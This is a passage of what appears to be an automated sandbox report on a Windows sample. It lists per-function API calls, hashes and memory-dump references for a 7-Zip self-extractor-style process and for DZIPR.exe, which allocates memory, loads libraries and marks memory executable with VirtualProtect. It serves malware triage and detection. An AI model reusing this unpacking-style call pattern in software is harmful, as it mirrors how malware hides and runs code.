Wow64DisableWow64FsRedirection, xrefs: 004021C0
kernel32, xrefs: 004021C5

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 2574300362-736604160
Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC

Function 00402A69 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F

Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$ByteCharMultiWide
String ID:
API String ID: 1731127917-0
Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658

Function 00403F85 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
wsprintfW.USER32 ref: 00403FFB
GetFileAttributesW.KERNEL32(?), ref: 00404016

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: PathTemp$AttributesFilewsprintf
String ID:
API String ID: 1746483863-0
Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88

Function 00401A85 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: CharUpper
String ID:
API String ID: 9403516-0
Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64

Function 00407FA5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
GetDlgItem.USER32(?,000004B7), ref: 00408020
SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E

Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92

Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
String ID:
API String ID: 2538916108-0
Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54

Function 004067ED Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
GetSystemMetrics.USER32(00000031), ref: 0040683A
CreateFontIndirectW.GDI32(?), ref: 00406849
DeleteObject.GDI32(00000000), ref: 00406878

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54

Function 0040748A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040749F
SHBrowseForFolderW.SHELL32(?), ref: 004074B8
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
SHGetMalloc.SHELL32(00000000), ref: 004074FE

Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: BrowseFocusFolderFromItemListMallocPathmemset
String ID:
API String ID: 1557639607-0
Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75

Function 004027C7 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801

Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@
String ID:
API String ID: 612612615-0
Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8

Function 00403AB1 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
SetWindowTextW.USER32(?,?), ref: 00403B12
??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98

Function 0040702A Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00407045
CreateFontIndirectW.GDI32(?), ref: 0040705B
GetDlgItem.USER32(?,000004B5), ref: 0040706F
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19

Function 00401BA3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00401BA8
GetWindowRect.USER32(?,?), ref: 00401BC1
ScreenToClient.USER32(00000000,?), ref: 00401BCF
ScreenToClient.USER32(00000000,?), ref: 00401BD6

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61

Function 00403C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00403C89

Strings

[G@, xrefs: 00403C64, 00403C88
GUIFlags, xrefs: 00403C68

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: _wtol
String ID: GUIFlags$[G@
API String ID: 2131799477-2126219683
Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D

Function 00402F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52

Strings

?O@, xrefs: 00402F23

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: EnvironmentVariable
String ID: ?O@
API String ID: 1431749950-3511380453
Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

Analysis Process: DZIPR.exePID: 7580, Parent PID: 7528COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.6%
Total number of Nodes:	1733
Total number of Limit Nodes:	37

Executed Functions

Function 6FE263F0 Relevance: 4.7, APIs: 3, Instructions: 239
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6FE26602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FE2663B
VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FE26654

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 7253e9b7ac9716459256c511a60541d454dd8fb665e8bbae8a1950b711758626
Instruction ID: a82c5b1238fd1fcb3ac45d0f4ad6056b562a23a95cbde2921993ad50e5e934cc
Opcode Fuzzy Hash: 7253e9b7ac9716459256c511a60541d454dd8fb665e8bbae8a1950b711758626
Instruction Fuzzy Hash: 65A1CE305087558FC315CF68C88062AFBE2BFCA308F198A6EE8D597356E735E955CB81

Function 6FE25CA0 Relevance: 3.4, APIs: 2, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: LibraryLoad_memset
String ID:
API String ID: 2997193564-0
Opcode ID: 9d59af48069228862bbbe6b4610c32b28d877bc65dcb4fbbcd5a9e69ccdc2a8e
Instruction ID: af97914aadcc4280111d6371c1eb7d79dcbffd2a08686340ae198b3fea0c9522
Opcode Fuzzy Hash: 9d59af48069228862bbbe6b4610c32b28d877bc65dcb4fbbcd5a9e69ccdc2a8e
Instruction Fuzzy Hash: 81E15C709087058FC728CF59C59062AFBE2FF89318F65892EE89987355EB30B955CB81

Function 6FE25E70 Relevance: 1.5, APIs: 1, Instructions: 248
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FE25ECA

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: bb5d16e43918b8784b3960748059a33e8f1eb1ae9b2918fd10d93b643f9e9097
Instruction ID: 15f61d435afbe232d9747f584548818ddbdd859de91eda1a08d068dad014a482
Opcode Fuzzy Hash: bb5d16e43918b8784b3960748059a33e8f1eb1ae9b2918fd10d93b643f9e9097
Instruction Fuzzy Hash: 1CA1A5706087168FC718DF1CC59062AFBE2BF8A304F24856DE89687355E771F965CB81

Function 6FE2BC4E Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(6FE532EC,?,?,?,6FE532D0,6FE532D0,?,6FE2C0A4,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2BC61
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,6FE532D0,6FE532D0,?,6FE2C0A4,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2BCB7
GlobalHandle.KERNEL32(00F5ADF0), ref: 6FE2BCC0
GlobalUnlock.KERNEL32(00000000), ref: 6FE2BCCA
GlobalReAlloc.KERNEL32(6FE4C168,00000000,00002002), ref: 6FE2BCE3
GlobalHandle.KERNEL32(00F5ADF0), ref: 6FE2BCF5
GlobalLock.KERNEL32(00000000), ref: 6FE2BCFC
LeaveCriticalSection.KERNEL32(?,?,?,6FE532D0,6FE532D0,?,6FE2C0A4,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2BD05
GlobalLock.KERNEL32(00000000), ref: 6FE2BD11
_memset.LIBCMT ref: 6FE2BD2B
LeaveCriticalSection.KERNEL32(?,?), ref: 6FE2BD59

Memory Dump Source

